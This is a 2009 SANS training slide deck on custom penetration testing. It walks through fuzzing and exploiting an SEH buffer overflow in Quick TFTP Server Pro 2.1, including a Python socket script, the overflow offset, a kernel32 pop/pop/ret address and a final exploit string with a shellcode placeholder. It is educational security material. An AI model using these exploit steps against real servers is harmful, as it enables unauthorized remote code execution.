Advanced Penetration Testing - 2009 SANS 1
Custom Penetration Testing
Compromising a Vulnerability through Discovery and Custom Exploitation
Stephen Sims
Advanced Penetration Testing - 2009 SANS 2
Objectives
• Penetration Testing• Precompiled Tools• Targeting• TFTP
– Testing a TFTP Server for Bugs– Discovering the Bug– Exploiting the TFTP Server
• Advanced Concepts
Advanced Penetration Testing - 2009 SANS 3
What is Penetration Testing?
• Process of testing a target environment for weaknesses– More thorough than vulnerability
scanning alone– Validates findings by exploiting flaws– Allows you to think like an attacker– Various levels of interaction/depth
Advanced Penetration Testing - 2009 SANS 4
Types of Penetration Testing
• Black-Box Penetration Testing– No access to source code– No access provided to OS, architecture, etc…– More like an outsider attack scenario
• More time consuming
• Crystal-Box Penetration Testing– Tester given source code, system & network architecture
and/or privileged system access– More thorough than black-box testing– Cost effective
Advanced Penetration Testing - 2009 SANS 5
Precompiled Tools
• Pros– Can quickly be used– Customer support– Broad user community– Often allow custom scripts or modules
• Cons– Limited in scope– Only discover and test known vulnerabilities– Skilled attackers are not relying solely on them– Precompiled tools offer a sense of complacency– Do not perform code coverage or do deep fuzzing
Advanced Penetration Testing - 2009 SANS 6
Targeting
• General Steps1. Determine Target Application and
Operating System2. Obtain a Copy of the Application3. Analyze RFC and Communications
Protocols4. Discover and Record a Crash Condition5. Analyze Crash Condition for Exploitation
Opportunities
Advanced Penetration Testing - 2009 SANS 7
1) Determine Target Application and Operating System
• What application/service are you analyzing?– What OS’ is it available for?
• Which one(s) are you interested in?
– What services does the application start up?• There may be several• Scanning may help• Analyze documentation and code if possible
– Are the services proprietary or standards-based?• Proprietary often offer a lot of new opportunities
Advanced Penetration Testing - 2009 SANS 8
2) Obtain a Copy of the Application
• Create a lab environment and install the application– Use the OS you are targeting– Utilize Virtual Machines
• Create snapshots prior to installation• Install monitoring tools
– Attempt to obtain the source code• Code analysis is often more complex than behavioral
analysis, but valuable
Advanced Penetration Testing - 2009 SANS 9
3) Analyze RFC and Communications Protocols
• Is documentation available? – Programmers should follow RFC’s
• Search RFC for potential options and fields that may contain opportunities to cause a fault
• Understand each aspect of the protocols used by the application and relative behavior
– Is architectural documentation available?
Advanced Penetration Testing - 2009 SANS 10
4) Discover and Record a Crash Condition
• Are you properly monitoring?– Sniffers to record packets sent to the application
• Wireshark/Tshark, tcpdump, etc…• Packets can be recorded and replayed
– Debuggers to record application behavior while receiving/handling data
• OllyDbg, Immunity Debugger, WinDbg
– OS monitoring tools to monitor health• ProcMon, RegMon, FileMon, RegShot, etc…
– The condition must be repeatable
Advanced Penetration Testing - 2009 SANS 11
5) Analyze Crash Condition for Exploitation Opportunities
• What is happening during the crash?– Analyze the status of each register
• Are registers holding or pointing to strange values? e.g. 0x41414141 if inputting A’s
– Is the Return Pointer or SEH chain being overwritten?
• Analyze the stack segment and monitor ESP/EBP
– Are heap pointers being overwritten?• Analyze dynamic memory allocations and behavior
– There’s way more to analyze, but this is a start!
Advanced Penetration Testing - 2009 SANS 12
Targeting (2)
• Our goal is to discover and exploit a Windows Program vulnerability!
• The techniques we’ll cover is applicable with any target or service
• We’re targeting a TFTP service– Must understand how the protocol works– Developers should follow RFC’s
• We can leverage the RFC as well
– Could use fuzzing to automate bug discovery
Advanced Penetration Testing - 2009 SANS 13
Our TFTP Target
• Quick TFTP Server Pro Version 2.1– Vulnerable to a stack-based buffer
overflow• Can exploit by overwriting the Structured Exception
Handling (SEH) chain• Allows for DoS or code execution as System
– TFTP Server Published by TallSoft– Vulnerability discovered in 2008 by Mati
Aharoni of Offensive Security
Advanced Penetration Testing - 2009 SANS 14
TFTP
• Trivial File Transfer Protocol (TFTP)– Simple protocol for transferring files
over a network– Clear-text protocol using UDP port 69– Used for transferring files by network
devices, VOIP phones and other client-server programs
Advanced Penetration Testing - 2009 SANS 15
TFTP Behavior
• Connection request is combined with either a read or write request
• Blocks of data are sent in a fixed 512 byte size– Each block must be acknowledged for error
control• A block less than 512 bytes indicates
the end of the stream
Advanced Penetration Testing - 2009 SANS 16
TFTP Behavior (2)
• The first two bytes of a TFTP header indicates the request type and format– \x00\x01 indicates a read request– \x00\x02 indicates a write request– \x00\x03 indicates the data block– \x00\x04 is an acknowledgement– \x00\x05 indicates an error– \x00\x06 is an optional acknowledgement
Advanced Penetration Testing - 2009 SANS 17
TFTP Behavior (3)
• Read and Write request format:– \x00\x01 for read | \x00\x02 for write– File Name– Null byte - \x00– Mode – Binary, ASCII or Mail– Null byte - \x00
• Example
Request Type File Name Null Mode Null
Read \x00\x01 file1.txt 0 Octet 0
Advanced Penetration Testing - 2009 SANS 18
Hacking Quick TFTP Server
• Quick TFTP Server Version 2.1– Install tftpserver_setup.exe onto a Windows XP
Virtual Machine– Use the TFTP information just covered to help
with the investigation– Attempt to crash the TFTP server while running in
a debugger– Create a custom script to start the testing– Validate findings– Attempt code execution
Advanced Penetration Testing - 2009 SANS 19
Tools We Need
• Programming/Scripting Language– Python, Perl, Ruby, C
• Debugger and Disassembler– OllyDbg, Immunity Debugger, IDAPro
• Shellcode– Metasploit, Milw0rm, Custom
• An open mind! – Knowledge of OS controls, Opcodes, Tricks…
Advanced Penetration Testing - 2009 SANS 20
Python
• Object-oriented, High-level Programming Language
• Very Intuitive• Very Modular• No Manual Compilation• Plays well with other languages – C, C++,
Jython, IronPython (.NET)• Good Debugging
Advanced Penetration Testing - 2009 SANS 21
Tool: OllyDbg
• Software Debugger for Windows– Author: Oleh Yuschuk
• Shareware!• Binary Code Analysis• Register Contents, Procedures, API
Calls, Patching, memory searching and more!
Advanced Penetration Testing - 2009 SANS 22
Hacking TFTP Hint #1
• Consider the format of TFTP requests for your script– We covered the order a few slides ago– Read & Write requests are often the easiest to
attack as they have variable fields• They start with \x00\x01 & \x00\x02
– The header format must be correct to trigger a valid response
– Command line scripting not always the best option• You may want to write a script
Advanced Penetration Testing - 2009 SANS 23
Hacking TFTP Hint #2
• Where could a buffer overflow condition exist?– Try the request type field, file name
and/or the mode– Don’t forget the nulls to terminate!– Make sure you’re watching the right
thread in OllyDbg• Processes have multiple threads on Windows
Advanced Penetration Testing - 2009 SANS 24
Hacking TFTP Hint #3
• The easiest way is to use Python or Perl to open a socket and send your script
import socketimport systarget = ‘IP ADDRESS’ #Enter the right IP hereport = 69 #Port for TFTPs = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)cmd = "A"*10 #Enter the number of A's to senddata = "\x00\x01"+ cmd #Modify this line to format your packets.sendto(data, (target, port))
Advanced Penetration Testing - 2009 SANS 25
Quick TFTP Walk-Through
• Start Quick TFTP Server with Olly
• Ignore entry point messages
• Press F9 once loaded
• Click “OK” on the demo pop-up
Advanced Penetration Testing - 2009 SANS 26
Quick TFTP Walk-Through (2)
• This may be possible via command line, but…– We need a script!– Don’t forget the formatting of TFTP read
and write requests:
– The overflow is in the mode section!
Request Type File Name Null Mode Null
Read \x00\x01 file1.txt 0 Octet 0
Advanced Penetration Testing - 2009 SANS 27
Quick TFTP Walk-Through (3)
• Write a python script that connects to the TFTP server with 1000 A’s
• No Crash in Olly…
Advanced Penetration Testing - 2009 SANS 28
Quick TFTP Walk-Through (4)
1060 A’s
Olly has paused
EIP is 41414141
Success!
Advanced Penetration Testing - 2009 SANS 29
Quick TFTP Walk-Through (5)
• What are we overwriting?
• Lets do some math to see where the overflow is occurring
We overwrote the SEH Chain!
Advanced Penetration Testing - 2009 SANS 30
Quick TFTP Walk-Through (6)
• Subtracting 41 A’s should take us to the SEH handler
• Lets give it a try by setting:cmd = "A"*1023+"\xde\xc0\xad\xde"
We control EIP at 1023 bytes!
Advanced Penetration Testing - 2009 SANS 31
Quick TFTP Walk-Through (7)
• We now need to find a valid pop/pop/ret instruction– Use the findjmp tool and experiment– 0x77ec9cac is one I chose from
kernel32.dll for XP SP1– Remember that you must compensate for
SafeSEH if hacking XP SP2/SP3– Also remember that not every pop/pop/ret
address will work. You gotta dig…
Advanced Penetration Testing - 2009 SANS 32
Quick TFTP Walk-Through (8)
• Finalizing our script…cmd = "A"*1019+"\xeb\x06\x90\x90"+"\xac\x9c\xec\x77"+"\x90"*4+scdata = "\x00\x01" + "blah" + "\x00"+cmd+"\x00“
Our jmp and pointer…
Our NOP’s and shellcode…
Advanced Penetration Testing - 2009 SANS 33
Advanced Concepts
• Depending on the OS Version, a number of controls have been added– SafeSEH
• Protects SEH pointers against overwrites– ASLR
• Randomizes locations of libraries and memory segments– DEP
• Prevents code execution on the stack and heap– Security Cookies
• Pushes unique values onto the stack and heap during allocations which are checked upon exit or free
• Every byte in memory is a potential full or partial opcode– As long as the segment is executable
Advanced Penetration Testing - 2009 SANS 34
More Information
• Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server by David Litchfield http://www.nextgenss.com/papers/defeating-w2k3-stack- protection.pdf
• Preventing the Exploitation of SEH Overwrites by Skape “Matt Miller” http://www.uninformed.org/?v=5&a=2&t=pdf
• SEH Overwrites Simplified v1.01 by Aelphaeis Mangaraehttp://www.milw0rm.com/papers/187
• Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass by Alexander Anisimov http://www.maxpatrol.com/defeating-xpsp2-heap-protection.pdf
• Reliable Windows Heap Exploits by Matt Conover & Oded Horovitz http://www.slideshare.net/amiable_indian/reliable-windows-heap-exploits
• Third Generation Exploitation by Halvar Flake www.blackhat.com/presentations/win-usa- 02/halvarflake-winsec02.ppt
• Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server by David Litchfield http://www.ngssoftware.com/papers/defeating-w2k3-stack- protection.pdf
• Heap Feng Shui in JavaScript” by Alexander Sotirov http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07- sotirov-apr19.pdf
• Understanding Windows Shellcode by Skape http://www.hick.org/code/skape/papers/win32- shellcode.pdf
Advanced Penetration Testing - 2009 SANS 35
End
• Questions?
SANS SEC709 “Developing Exploits for Penetration
Testers and Security Researchers”[email protected]